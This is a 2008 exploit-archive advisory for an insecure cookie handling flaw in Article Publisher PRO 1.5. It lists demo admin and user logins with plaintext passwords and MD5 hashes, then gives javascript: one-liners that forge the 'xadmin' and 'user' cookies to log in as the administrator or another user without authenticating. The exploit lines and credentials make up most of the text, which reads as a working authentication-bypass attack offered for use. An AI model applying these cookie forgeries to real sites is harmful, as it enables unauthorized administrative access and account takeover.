articlepublisherpro-insecure.txt

2008-11-03T00:00:00
ID PACKETSTORM:71475
Type packetstorm
Reporter ZoRLu
Modified 2008-11-03T00:00:00

Description

                                        
                                            `[~] Article Publisher PRO Insecure Cookie Handling Vulnerability  
[~]  
[~] version: 1.5  
[~]  
[~] ----------------------------------------------------------  
[~] Discovered By: ZoRLu  
[~]  
[~] Date: 01.11.2008  
[~]  
[~] Home: www.z0rlu.blogspot.com  
[~]  
[~] contact: trt-turk@hotmail.com  
[~]  
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (  
[~]   
[~] N0T: a.q kpss : ) )  
[~]  
[~] ----------------------------------------------------------  
  
demo admin login:  
  
http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php  
  
demo user login:  
  
http://demo-article-publisher-pro.phparticlescript.com/login.php  
  
  
admin_name: admin  
  
passwd: demo  
  
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229  
  
user_id: 1  
  
or  
  
user_name: zorlu  
  
passwd: zorlu  
  
passwd_md5: 2178fb3ee4a88f946ecb68734b266c10  
  
user_id: 6  
  
or  
  
user_name: demo  
  
passwd: demo  
  
passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229  
  
user_id: 2  
  
  
exploit:  
  
admin:  
  
javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";  
  
user:   
  
javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";  
  
for demo admin: ( user_id: 1)  
  
javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";  
  
for demo user: ( for user zorlu user_id: 6 )  
  
javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";  
  
for demo user: ( for user demo user_id: 2 )  
  
javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";  
  
  
[~]----------------------------------------------------------------------  
[~] Greetz tO: str0ke & all Muslim HaCkeRs  
[~]  
[~] yildirimordulari.org & darkc0de.com  
[~]  
[~]----------------------------------------------------------------------  
  
`